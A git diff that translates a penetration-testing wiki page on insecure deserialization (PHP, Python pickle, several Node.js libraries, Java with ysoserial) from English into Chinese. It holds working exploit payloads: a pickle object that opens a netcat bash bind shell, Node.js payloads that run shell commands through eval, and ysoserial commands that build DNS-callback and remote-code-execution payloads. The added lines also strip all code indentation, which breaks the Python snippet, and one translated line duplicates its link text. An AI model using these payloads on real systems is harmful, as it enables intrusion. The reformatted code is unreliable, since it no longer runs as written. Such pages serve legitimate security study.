diff --git a/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md b/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md
index 668320c6b..84fa6aedf 100644
--- a/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md
+++ b/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md
@@ -2,7 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**Check the post [https://infosec.zeyu2001.com/2023/from-xs-leaks-to-ss-leaks](https://infosec.zeyu2001.com/2023/from-xs-leaks-to-ss-leaks)**
+**查看帖子 [https://infosec.zeyu2001.com/2023/from-xs-leaks-to-ss-leaks](https://infosec.zeyu2001.com/2023/from-xs-leaks-to-ss-leaks)**
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/deserialization/README.md b/src/pentesting-web/deserialization/README.md
index 39fcdc5b7..336be0611 100644
--- a/src/pentesting-web/deserialization/README.md
+++ b/src/pentesting-web/deserialization/README.md
@@ -1,49 +1,48 @@
-# Deserialization
+# 反序列化
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-**Serialization** is understood as the method of converting an object into a format that can be preserved, with the intent of either storing the object or transmitting it as part of a communication process. This technique is commonly employed to ensure that the object can be recreated at a later time, maintaining its structure and state.
+**序列化** 被理解为将对象转换为可以保存的格式的方法，目的是存储对象或将其作为通信过程的一部分进行传输。这种技术通常用于确保对象可以在稍后的时间重新创建，保持其结构和状态。
 
-**Deserialization**, conversely, is the process that counteracts serialization. It involves taking data that has been structured in a specific format and reconstructing it back into an object.
+**反序列化** 则是与序列化相对的过程。它涉及将以特定格式结构化的数据重新构建回对象。
 
-Deserialization can be dangerous because it potentially **allows attackers to manipulate the serialized data to execute harmful code** or cause unexpected behavior in the application during the object reconstruction process.
+反序列化可能是危险的，因为它可能 **允许攻击者操纵序列化数据以执行有害代码** 或在对象重建过程中导致应用程序出现意外行为。
 
 ## PHP
 
-In PHP, specific magic methods are utilized during the serialization and deserialization processes:
-
-- `__sleep`: Invoked when an object is being serialized. This method should return an array of the names of all properties of the object that should be serialized. It's commonly used to commit pending data or perform similar cleanup tasks.
-- `__wakeup`: Called when an object is being deserialized. It's used to reestablish any database connections that may have been lost during serialization and perform other reinitialization tasks.
-- `__unserialize`: This method is called instead of `__wakeup` (if it exists) when an object is being deserialized. It gives more control over the deserialization process compared to `__wakeup`.
-- `__destruct`: This method is called when an object is about to be destroyed or when the script ends. It's typically used for cleanup tasks, like closing file handles or database connections.
-- `__toString`: This method allows an object to be treated as a string. It can be used for reading a file or other tasks based on the function calls within it, effectively providing a textual representation of the object.
+在 PHP 中，特定的魔术方法在序列化和反序列化过程中被使用：
 
+- `__sleep`: 在对象被序列化时调用。此方法应返回一个数组，包含所有应被序列化的对象属性的名称。它通常用于提交待处理的数据或执行类似的清理任务。
+- `__wakeup`: 在对象被反序列化时调用。它用于重新建立在序列化过程中可能丢失的任何数据库连接，并执行其他重新初始化任务。
+- `__unserialize`: 当对象被反序列化时，此方法会被调用（如果存在），而不是 `__wakeup`。与 `__wakeup` 相比，它对反序列化过程提供了更多控制。
+- `__destruct`: 当对象即将被销毁或脚本结束时调用此方法。它通常用于清理任务，例如关闭文件句柄或数据库连接。
+- `__toString`: 此方法允许将对象视为字符串。它可以用于读取文件或其他基于其中函数调用的任务，有效地提供对象的文本表示。
 ```php
 <?php
 class test {
-    public $s = "This is a test";
-    public function displaystring(){
-        echo $this->s.'<br />';
-    }
-    public function __toString()
-    {
-        echo '__toString method called';
-    }
-    public function __construct(){
-        echo "__construct method called";
-    }
-    public function __destruct(){
-        echo "__destruct method called";
-    }
-    public function __wakeup(){
-        echo "__wakeup method called";
-    }
-    public function __sleep(){
-        echo "__sleep method called";
-        return array("s"); #The "s" makes references to the public attribute
-    }
+public $s = "This is a test";
+public function displaystring(){
+echo $this->s.'<br />';
+}
+public function __toString()
+{
+echo '__toString method called';
+}
+public function __construct(){
+echo "__construct method called";
+}
+public function __destruct(){
+echo "__destruct method called";
+}
+public function __wakeup(){
+echo "__wakeup method called";
+}
+public function __sleep(){
+echo "__sleep method called";
+return array("s"); #The "s" makes references to the public attribute
+}
 }
 
 $o = new test();
@@ -75,11 +74,10 @@ This is a test<br />
 */
 ?>
 ```
-
-If you look to the results you can see that the functions **`__wakeup`** and **`__destruct`** are called when the object is deserialized. Note that in several tutorials you will find that the **`__toString`** function is called when trying yo print some attribute, but apparently that's **not happening anymore**.
+如果你查看结果，你会发现当对象被反序列化时，**`__wakeup`** 和 **`__destruct`** 函数被调用。请注意，在一些教程中，你会发现当尝试打印某个属性时，**`__toString`** 函数被调用，但显然这**不再发生**。
 
 > [!WARNING]
-> The method **`__unserialize(array $data)`** is called **instead of `__wakeup()`** if it is implemented in the class. It allows you to unserialize the object by providing the serialized data as an array. You can use this method to unserialize properties and perform any necessary tasks upon deserialization.
+> 如果在类中实现了方法 **`__unserialize(array $data)`**，则会**代替 `__wakeup()`** 被调用。它允许你通过提供序列化数据作为数组来反序列化对象。你可以使用此方法来反序列化属性并在反序列化时执行任何必要的任务。
 >
 > ```php
 > class MyClass {
@@ -87,30 +85,29 @@ If you look to the results you can see that the functions **`__wakeup`** and **`
 >
 >     public function __unserialize(array $data): void {
 >         $this->property = $data['property'];
->         // Perform any necessary tasks upon deserialization.
+>         // 在反序列化时执行任何必要的任务。
 >     }
 > }
 > ```
 
-You can read an explained **PHP example here**: [https://www.notsosecure.com/remote-code-execution-via-php-unserialize/](https://www.notsosecure.com/remote-code-execution-via-php-unserialize/), here [https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf) or here [https://securitycafe.ro/2015/01/05/understanding-php-object-injection/](https://securitycafe.ro/2015/01/05/understanding-php-object-injection/)
+你可以在这里阅读一个解释过的 **PHP 示例**: [https://www.notsosecure.com/remote-code-execution-via-php-unserialize/](https://www.notsosecure.com/remote-code-execution-via-php-unserialize/)，在这里 [https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf) 或在这里 [https://securitycafe.ro/2015/01/05/understanding-php-object-injection/](https://securitycafe.ro/2015/01/05/understanding-php-object-injection/)
 
-### PHP Deserial + Autoload Classes
+### PHP 反序列化 + 自动加载类
 
-You could abuse the PHP autoload functionality to load arbitrary php files and more:
+你可以滥用 PHP 自动加载功能来加载任意 php 文件等：
 
 {{#ref}}
 php-deserialization-+-autoload-classes.md
 {{#endref}}
 
-### Serializing Referenced Values
-
-If for some reason you want to serialize a value as a **reference to another value serialized** you can:
+### 序列化引用值
 
+如果出于某种原因你想将一个值序列化为**对另一个序列化值的引用**，你可以：
 ```php
 <?php
 class AClass {
-    public $param1;
-    public $param2;
+public $param1;
+public $param2;
 }
 
 $o = new WeirdGreeting;
@@ -118,17 +115,16 @@ $o->param1 =& $o->param22;
 $o->param = "PARAM";
 $ser=serialize($o);
 ```
-
 ### PHPGGC (ysoserial for PHP)
 
-[**PHPGGC**](https://github.com/ambionics/phpggc) can help you generating payloads to abuse PHP deserializations.\
-Note than in several cases you **won't be able to find a way to abuse a deserialization in the source code** of the application but you may be able to **abuse the code of external PHP extensions.**\
-So, if you can, check the `phpinfo()` of the server and **search on the internet** (an even on the **gadgets** of **PHPGGC**) some possible gadget you could abuse.
+[**PHPGGC**](https://github.com/ambionics/phpggc) 可以帮助你生成利用 PHP 反序列化的有效载荷。\
+请注意，在某些情况下，你 **无法在应用程序的源代码中找到利用反序列化的方法**，但你可能能够 **利用外部 PHP 扩展的代码。**\
+因此，如果可以，请检查服务器的 `phpinfo()` 并 **在互联网上搜索**（甚至在 **PHPGGC** 的 **gadgets** 中）一些可能的你可以利用的 gadget。
 
 ### phar:// metadata deserialization
 
-If you have found a LFI that is just reading the file and not executing the php code inside of it, for example using functions like _**file_get_contents(), fopen(), file() or file_exists(), md5_file(), filemtime() or filesize()**_**.** You can try to abuse a **deserialization** occurring when **reading** a **file** using the **phar** protocol.\
-For more information read the following post:
+如果你发现一个 LFI 只是读取文件而不执行其中的 php 代码，例如使用 _**file_get_contents(), fopen(), file() 或 file_exists(), md5_file(), filemtime() 或 filesize()**_**。** 你可以尝试利用在使用 **phar** 协议时 **读取** **文件** 发生的 **反序列化**。\
+有关更多信息，请阅读以下帖子：
 
 {{#ref}}
 ../file-inclusion/phar-deserialization.md
@@ -138,20 +134,18 @@ For more information read the following post:
 
 ### **Pickle**
 
-When the object gets unpickle, the function \_\_\_reduce\_\_\_ will be executed.\
-When exploited, server could return an error.
-
+当对象被反序列化时，函数 \_\_\_reduce\_\_\_ 将被执行。\
+当被利用时，服务器可能会返回一个错误。
 ```python
 import pickle, os, base64
 class P(object):
-    def __reduce__(self):
-        return (os.system,("netcat -c '/bin/bash -i' -l -p 1234 ",))
+def __reduce__(self):
+return (os.system,("netcat -c '/bin/bash -i' -l -p 1234 ",))
 print(base64.b64encode(pickle.dumps(P())))
 ```
+在检查绕过技术之前，如果您正在运行 python3，请尝试使用 `print(base64.b64encode(pickle.dumps(P(),2)))` 生成与 python2 兼容的对象。
 
-Before checking the bypass technique, try using `print(base64.b64encode(pickle.dumps(P(),2)))` to generate an object that is compatible with python2 if you're running python3.
-
-For more information about escaping from **pickle jails** check:
+有关从 **pickle jails** 逃逸的更多信息，请查看：
 
 {{#ref}}
 ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/
@@ -159,13 +153,13 @@ For more information about escaping from **pickle jails** check:
 
 ### Yaml **&** jsonpickle
 
-The following page present the technique to **abuse an unsafe deserialization in yamls** python libraries and finishes with a tool that can be used to generate RCE deserialization payload for **Pickle, PyYAML, jsonpickle and ruamel.yaml**:
+以下页面介绍了 **滥用不安全的 yaml 反序列化** python 库的技术，并以一个可以用于生成 **Pickle, PyYAML, jsonpickle 和 ruamel.yaml** 的 RCE 反序列化有效负载的工具结束：
 
 {{#ref}}
 python-yaml-deserialization.md
 {{#endref}}
 
-### Class Pollution (Python Prototype Pollution)
+### 类污染 (Python 原型污染)
 
 {{#ref}}
 ../../generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md
@@ -173,40 +167,38 @@ python-yaml-deserialization.md
 
 ## NodeJS
 
-### JS Magic Functions
+### JS 魔法函数
 
-JS **doesn't have "magic" functions** like PHP or Python that are going to be executed just for creating an object. But it has some **functions** that are **frequently used even without directly calling them** such as **`toString`**, **`valueOf`**, **`toJSON`**.\
-If abusing a deserialization you can **compromise these functions to execute other code** (potentially abusing prototype pollutions) you could execute arbitrary code when they are called.
-
-Another **"magic" way to call a function** without calling it directly is by **compromising an object that is returned by an async function** (promise). Because, if you **transform** that **return object** in another **promise** with a **property** called **"then" of type function**, it will be **executed** just because it's returned by another promise. _Follow_ [_**this link**_](https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/) _for more info._
+JS **没有像 PHP 或 Python 那样的 "魔法" 函数**，这些函数仅用于创建对象而被执行。但它有一些 **函数**，即使没有直接调用它们也 **经常使用**，例如 **`toString`**、**`valueOf`**、**`toJSON`**。\
+如果滥用反序列化，您可以 **妥协这些函数以执行其他代码**（可能滥用原型污染），当它们被调用时，您可以执行任意代码。
 
+另一种 **"魔法" 调用函数** 的方式是 **妥协一个由异步函数**（promise）**返回的对象**。因为，如果您 **将该返回对象** 转换为另一个 **promise**，并具有一个名为 **"then" 的函数类型属性**，它将仅因为它是由另一个 promise 返回而被 **执行**。_有关更多信息，请_ [_**点击此链接**_](https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/) _。_
 ```javascript
 // If you can compromise p (returned object) to be a promise
 // it will be executed just because it's the return object of an async function:
 async function test_resolve() {
-  const p = new Promise((resolve) => {
-    console.log("hello")
-    resolve()
-  })
-  return p
+const p = new Promise((resolve) => {
+console.log("hello")
+resolve()
+})
+return p
 }
 
 async function test_then() {
-  const p = new Promise((then) => {
-    console.log("hello")
-    return 1
-  })
-  return p
+const p = new Promise((then) => {
+console.log("hello")
+return 1
+})
+return p
 }
 
 test_ressolve()
 test_then()
 //For more info: https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/
 ```
+### `__proto__` 和 `prototype` 污染
 
-### `__proto__` and `prototype` pollution
-
-If you want to learn about this technique **take a look to the following tutorial**:
+如果你想了解这个技术 **请查看以下教程**：
 
 {{#ref}}
 nodejs-proto-prototype-pollution/
@@ -214,71 +206,62 @@ nodejs-proto-prototype-pollution/
 
 ### [node-serialize](https://www.npmjs.com/package/node-serialize)
 
-This library allows to serialise functions. Example:
-
+这个库允许序列化函数。示例：
 ```javascript
 var y = {
-  rce: function () {
-    require("child_process").exec("ls /", function (error, stdout, stderr) {
-      console.log(stdout)
-    })
-  },
+rce: function () {
+require("child_process").exec("ls /", function (error, stdout, stderr) {
+console.log(stdout)
+})
+},
 }
 var serialize = require("node-serialize")
 var payload_serialized = serialize.serialize(y)
 console.log("Serialized: \n" + payload_serialized)
 ```
-
-The **serialised object** will looks like:
-
+序列化对象将如下所示：
 ```bash
 {"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}"}
 ```
+您可以在示例中看到，当一个函数被序列化时，`_$$ND_FUNC$$_` 标志被附加到序列化对象上。
 
-You can see in the example that when a function is serialized the `_$$ND_FUNC$$_` flag is appended to the serialized object.
-
-Inside the file `node-serialize/lib/serialize.js` you can find the same flag and how the code is using it.
+在文件 `node-serialize/lib/serialize.js` 中，您可以找到相同的标志以及代码是如何使用它的。
 
 ![](<../../images/image (351).png>)
 
 ![](<../../images/image (446).png>)
 
-As you may see in the last chunk of code, **if the flag is found** `eval` is used to deserialize the function, so basically **user input if being used inside the `eval` function**.
-
-However, **just serialising** a function **won't execute it** as it would be necessary that some part of the code is **calling `y.rce`** in our example and that's highly **unlikable**.\
-Anyway, you could just **modify the serialised object** **adding some parenthesis** in order to auto execute the serialized function when the object is deserialized.\
-In the next chunk of code **notice the last parenthesis** and how the `unserialize` function will automatically execute the code:
+正如您在最后一段代码中看到的，**如果找到该标志**，则使用 `eval` 来反序列化函数，因此基本上**用户输入被用于 `eval` 函数内部**。
 
+然而，**仅仅序列化**一个函数**不会执行它**，因为在我们的示例中需要某部分代码**调用 `y.rce`**，这非常**不可能**。\
+无论如何，您可以**修改序列化对象**，**添加一些括号**，以便在对象被反序列化时自动执行序列化的函数。\
+在下一段代码中**注意最后的括号**以及 `unserialize` 函数将如何自动执行代码：
 ```javascript
 var serialize = require("node-serialize")
 var test = {
-  rce: "_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }()",
+rce: "_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }()",
 }
 serialize.unserialize(test)
 ```
-
-As it was previously indicated, this library will get the code after`_$$ND_FUNC$$_` and will **execute it** using `eval`. Therefore, in order to **auto-execute code** you can **delete the function creation** part and the last parenthesis and **just execute a JS oneliner** like in the following example:
-
+如前所述，该库将在`_$$ND_FUNC$$_`之后获取代码并将其**执行**，因此，为了**自动执行代码**，您可以**删除函数创建**部分和最后一个括号，并**仅执行一个 JS 单行代码**，如下例所示：
 ```javascript
 var serialize = require("node-serialize")
 var test =
-  "{\"rce\":\"_$$ND_FUNC$$_require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })\"}"
+"{\"rce\":\"_$$ND_FUNC$$_require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })\"}"
 serialize.unserialize(test)
 ```
-
-You can [**find here**](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/) **further information** about how to exploit this vulnerability.
+您可以[**在这里找到**](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/) **有关如何利用此漏洞的更多信息**。
 
 ### [funcster](https://www.npmjs.com/package/funcster)
 
-A noteworthy aspect of **funcster** is the inaccessibility of **standard built-in objects**; they fall outside the accessible scope. This restriction prevents the execution of code that attempts to invoke methods on built-in objects, leading to exceptions such as `"ReferenceError: console is not defined"` when commands like `console.log()` or `require(something)` are used.
-
-Despite this limitation, restoration of full access to the global context, including all standard built-in objects, is possible through a specific approach. By leveraging the global context directly, one can bypass this restriction. For instance, access can be re-established using the following snippet:
+**funcster** 的一个显著特点是 **标准内置对象** 的不可访问性；它们超出了可访问范围。此限制阻止了尝试在内置对象上调用方法的代码执行，当使用 `console.log()` 或 `require(something)` 等命令时，会导致 `"ReferenceError: console is not defined"` 等异常。
 
+尽管有此限制，但可以通过特定方法恢复对全局上下文的完全访问，包括所有标准内置对象。通过直接利用全局上下文，可以绕过此限制。例如，可以使用以下代码片段重新建立访问：
 ```javascript
 funcster = require("funcster")
 //Serialization
 var test = funcster.serialize(function () {
-  return "Hello world!"
+return "Hello world!"
 })
 console.log(test) // { __js_function: 'function(){return"Hello world!"}' }
 
@@ -286,133 +269,123 @@ console.log(test) // { __js_function: 'function(){return"Hello world!"}' }
 var desertest1 = { __js_function: 'function(){return "Hello world!"}()' }
 funcster.deepDeserialize(desertest1)
 var desertest2 = {
-  __js_function: 'this.constructor.constructor("console.log(1111)")()',
+__js_function: 'this.constructor.constructor("console.log(1111)")()',
 }
 funcster.deepDeserialize(desertest2)
 var desertest3 = {
-  __js_function:
-    "this.constructor.constructor(\"require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });\")()",
+__js_function:
+"this.constructor.constructor(\"require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });\")()",
 }
 funcster.deepDeserialize(desertest3)
 ```
-
-**For**[ **more information read this source**](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)**.**
+**有关**[ **更多信息，请阅读此来源**](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)**。**
 
 ### [**serialize-javascript**](https://www.npmjs.com/package/serialize-javascript)
 
-The **serialize-javascript** package is designed exclusively for serialization purposes, lacking any built-in deserialization capabilities. Users are responsible for implementing their own method for deserialization. A direct use of `eval` is suggested by the official example for deserializing serialized data:
-
+**serialize-javascript** 包专门用于序列化目的，缺乏任何内置的反序列化功能。用户需自行实现反序列化的方法。官方示例建议直接使用 `eval` 来反序列化序列化的数据：
 ```javascript
 function deserialize(serializedJavascript) {
-  return eval("(" + serializedJavascript + ")")
+return eval("(" + serializedJavascript + ")")
 }
 ```
-
-If this function is used to deserialize objects you can **easily exploit it**:
-
+如果这个函数用于反序列化对象，你可以**轻松利用它**：
 ```javascript
 var serialize = require("serialize-javascript")
 //Serialization
 var test = serialize(function () {
-  return "Hello world!"
+return "Hello world!"
 })
 console.log(test) //function() { return "Hello world!" }
 
 //Deserialization
 var test =
-  "function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }()"
+"function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }()"
 deserialize(test)
 ```
+**有关更多信息，请阅读此来源**[ **更多信息读这个源**](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)**.**
 
-**For**[ **more information read this source**](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)**.**
+### Cryo库
 
-### Cryo library
-
-In the following pages you can find information about how to abuse this library to execute arbitrary commands:
+在以下页面中，您可以找到有关如何滥用此库以执行任意命令的信息：
 
 - [https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)
 - [https://hackerone.com/reports/350418](https://hackerone.com/reports/350418)
 
 ## Java - HTTP
 
-In Java, **deserialization callbacks are executed during the process of deserialization**. This execution can be exploited by attackers who craft malicious payloads that trigger these callbacks, leading to potential execution of harmful actions.
+在Java中，**反序列化回调在反序列化过程中执行**。攻击者可以利用恶意有效负载触发这些回调，从而导致潜在的有害操作执行。
 
-### Fingerprints
+### 指纹
 
-#### White Box
+#### 白盒
 
-To identify potential serialization vulnerabilities in the codebase search for:
+要识别代码库中的潜在序列化漏洞，请搜索：
 
-- Classes that implement the `Serializable` interface.
-- Usage of `java.io.ObjectInputStream`, `readObject`, `readUnshare` functions.
+- 实现了`Serializable`接口的类。
+- 使用`java.io.ObjectInputStream`、`readObject`、`readUnshare`函数。
 
-Pay extra attention to:
+特别注意：
 
-- `XMLDecoder` utilized with parameters defined by external users.
-- `XStream`'s `fromXML` method, especially if the XStream version is less than or equal to 1.46, as it is susceptible to serialization issues.
-- `ObjectInputStream` coupled with the `readObject` method.
-- Implementation of methods such as `readObject`, `readObjectNodData`, `readResolve`, or `readExternal`.
-- `ObjectInputStream.readUnshared`.
-- General use of `Serializable`.
+- 与外部用户定义的参数一起使用的`XMLDecoder`。
+- `XStream`的`fromXML`方法，特别是当XStream版本小于或等于1.46时，因为它容易受到序列化问题的影响。
+- 与`readObject`方法结合使用的`ObjectInputStream`。
+- 实现`readObject`、`readObjectNodData`、`readResolve`或`readExternal`等方法。
+- `ObjectInputStream.readUnshared`。
+- 一般使用`Serializable`。
 
-#### Black Box
+#### 黑盒
 
-For black box testing, look for specific **signatures or "Magic Bytes"** that denote java serialized objects (originating from `ObjectInputStream`):
-
-- Hexadecimal pattern: `AC ED 00 05`.
-- Base64 pattern: `rO0`.
-- HTTP response headers with `Content-type` set to `application/x-java-serialized-object`.
-- Hexadecimal pattern indicating prior compression: `1F 8B 08 00`.
-- Base64 pattern indicating prior compression: `H4sIA`.
-- Web files with the `.faces` extension and the `faces.ViewState` parameter. Discovering these patterns in a web application should prompt an examination as detailed in the [post about Java JSF ViewState Deserialization](java-jsf-viewstate-.faces-deserialization.md).
+对于黑盒测试，寻找特定的**签名或“魔法字节”**，以表示来自`ObjectInputStream`的Java序列化对象：
 
+- 十六进制模式：`AC ED 00 05`。
+- Base64模式：`rO0`。
+- HTTP响应头中`Content-type`设置为`application/x-java-serialized-object`。
+- 表示先前压缩的十六进制模式：`1F 8B 08 00`。
+- 表示先前压缩的Base64模式：`H4sIA`。
+- 具有`.faces`扩展名的Web文件和`faces.ViewState`参数。在Web应用程序中发现这些模式应提示进行详细检查，如[关于Java JSF ViewState反序列化的帖子](java-jsf-viewstate-.faces-deserialization.md)所述。
 ```
 javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwdAAML2xvZ2luLnhodG1s
 ```
+### 检查是否存在漏洞
 
-### Check if vulnerable
+如果你想要**了解Java反序列化漏洞是如何工作的**，你应该查看[**基本Java反序列化**](basic-java-deserialization-objectinputstream-readobject.md)、[**Java DNS反序列化**](java-dns-deserialization-and-gadgetprobe.md)和[**CommonsCollection1有效载荷**](java-transformers-to-rutime-exec-payload.md)。
 
-If you want to **learn about how does a Java Deserialized exploit work** you should take a look to [**Basic Java Deserialization**](basic-java-deserialization-objectinputstream-readobject.md), [**Java DNS Deserialization**](java-dns-deserialization-and-gadgetprobe.md), and [**CommonsCollection1 Payload**](java-transformers-to-rutime-exec-payload.md).
-
-#### White Box Test
-
-You can check if there is installed any application with known vulnerabilities.
+#### 白盒测试
 
+你可以检查是否安装了任何已知漏洞的应用程序。
 ```bash
 find . -iname "*commons*collection*"
 grep -R InvokeTransformer .
 ```
+您可以尝试**检查所有已知的易受攻击库**，并且[**Ysoserial**](https://github.com/frohoff/ysoserial)可以提供利用。或者您可以检查[Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json)中指示的库。\
+您还可以使用[**gadgetinspector**](https://github.com/JackOfMostTrades/gadgetinspector)搜索可能被利用的gadget链。\
+运行**gadgetinspector**（构建后）时，不必在意它所经历的大量警告/错误，让它完成。它会将所有发现写入_gadgetinspector/gadget-results/gadget-chains-year-month-day-hore-min.txt_。请注意，**gadgetinspector不会创建利用，并且可能会指示误报**。
 
-You could try to **check all the libraries** known to be vulnerable and that [**Ysoserial** ](https://github.com/frohoff/ysoserial)can provide an exploit for. Or you could check the libraries indicated on [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json).\
-You could also use [**gadgetinspector**](https://github.com/JackOfMostTrades/gadgetinspector) to search for possible gadget chains that can be exploited.\
-When running **gadgetinspector** (after building it) don't care about the tons of warnings/errors that it's going through and let it finish. It will write all the findings under _gadgetinspector/gadget-results/gadget-chains-year-month-day-hore-min.txt_. Please, notice that **gadgetinspector won't create an exploit and it may indicate false positives**.
+#### 黑盒测试
 
-#### Black Box Test
+使用Burp扩展[**gadgetprobe**](java-dns-deserialization-and-gadgetprobe.md)，您可以识别**可用的库**（甚至版本）。有了这些信息，选择一个有效载荷来利用漏洞可能会**更容易**。\
+[**阅读此文以了解更多关于GadgetProbe的信息**](java-dns-deserialization-and-gadgetprobe.md#gadgetprobe)**。**\
+GadgetProbe专注于**`ObjectInputStream`反序列化**。
 
-Using the Burp extension [**gadgetprobe**](java-dns-deserialization-and-gadgetprobe.md) you can identify **which libraries are available** (and even the versions). With this information it could be **easier to choose a payload** to exploit the vulnerability.\
-[**Read this to learn more about GadgetProbe**](java-dns-deserialization-and-gadgetprobe.md#gadgetprobe)**.**\
-GadgetProbe is focused on **`ObjectInputStream` deserializations**.
+使用Burp扩展[**Java Deserialization Scanner**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner)，您可以**识别可被ysoserial利用的易受攻击库**并**利用**它们。\
+[**阅读此文以了解更多关于Java Deserialization Scanner的信息。**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner)\
+Java Deserialization Scanner专注于**`ObjectInputStream`**反序列化。
 
-Using Burp extension [**Java Deserialization Scanner**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) you can **identify vulnerable libraries** exploitable with ysoserial and **exploit** them.\
-[**Read this to learn more about Java Deserialization Scanner.**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner)\
-Java Deserialization Scanner is focused on **`ObjectInputStream`** deserializations.
+您还可以使用[**Freddy**](https://github.com/nccgroup/freddy)来**检测Burp中的反序列化**漏洞。此插件将检测**不仅是`ObjectInputStream`**相关的漏洞，还**包括**来自**Json**和**Yml**反序列化库的漏洞。在主动模式下，它将尝试使用延迟或DNS有效载荷来确认它们。\
+[**您可以在这里找到更多关于Freddy的信息。**](https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2018/june/finding-deserialisation-issues-has-never-been-easier-freddy-the-serialisation-killer/)
 
-You can also use [**Freddy**](https://github.com/nccgroup/freddy) to **detect deserializations** vulnerabilities in **Burp**. This plugin will detect **not only `ObjectInputStream`** related vulnerabilities but **also** vulns from **Json** an **Yml** deserialization libraries. In active mode, it will try to confirm them using sleep or DNS payloads.\
-[**You can find more information about Freddy here.**](https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2018/june/finding-deserialisation-issues-has-never-been-easier-freddy-the-serialisation-killer/)
+**序列化测试**
 
-**Serialization Test**
+并非所有内容都与检查服务器是否使用任何易受攻击的库有关。有时您可以**更改序列化对象内部的数据并绕过某些检查**（可能授予您在web应用程序中的管理员权限）。\
+如果您发现一个java序列化对象被发送到web应用程序，**您可以使用**[**SerializationDumper**](https://github.com/NickstaDB/SerializationDumper) **以更人性化的格式打印发送的序列化对象**。知道您发送了哪些数据将更容易修改它并绕过某些检查。
 
-Not all is about checking if any vulnerable library is used by the server. Sometimes you could be able to **change the data inside the serialized object and bypass some checks** (maybe grant you admin privileges inside a webapp).\
-If you find a java serialized object being sent to a web application, **you can use** [**SerializationDumper**](https://github.com/NickstaDB/SerializationDumper) **to print in a more human readable format the serialization object that is sent**. Knowing which data are you sending would be easier to modify it and bypass some checks.
-
-### **Exploit**
+### **利用**
 
 #### **ysoserial**
 
-The main tool to exploit Java deserializations is [**ysoserial**](https://github.com/frohoff/ysoserial) ([**download here**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)). You can also consider using [**ysoseral-modified**](https://github.com/pimps/ysoserial-modified) which will allow you to use complex commands (with pipes for example).\
-Note that this tool is **focused** on exploiting **`ObjectInputStream`**.\
-I would **start using the "URLDNS"** payload **before a RCE** payload to test if the injection is possible. Anyway, note that maybe the "URLDNS" payload is not working but other RCE payload is.
-
+利用Java反序列化的主要工具是[**ysoserial**](https://github.com/frohoff/ysoserial)（[**在此下载**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)）。您还可以考虑使用[**ysoseral-modified**](https://github.com/pimps/ysoserial-modified)，这将允许您使用复杂的命令（例如带管道的命令）。\
+请注意，此工具**专注于**利用**`ObjectInputStream`**。\
+我会**先使用“URLDNS”**有效载荷**再使用RCE**有效载荷来测试注入是否可能。无论如何，请注意“URLDNS”有效载荷可能不起作用，但其他RCE有效载荷可能有效。
 ```bash
 # PoC to make the application perform a DNS req
 java -jar ysoserial-master-SNAPSHOT.jar URLDNS http://b7j40108s43ysmdpplgd3b7rdij87x.burpcollaborator.net > payload
@@ -457,11 +430,9 @@ java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,ZXhwb
 # Base64 encode payload in base64
 base64 -w0 payload
 ```
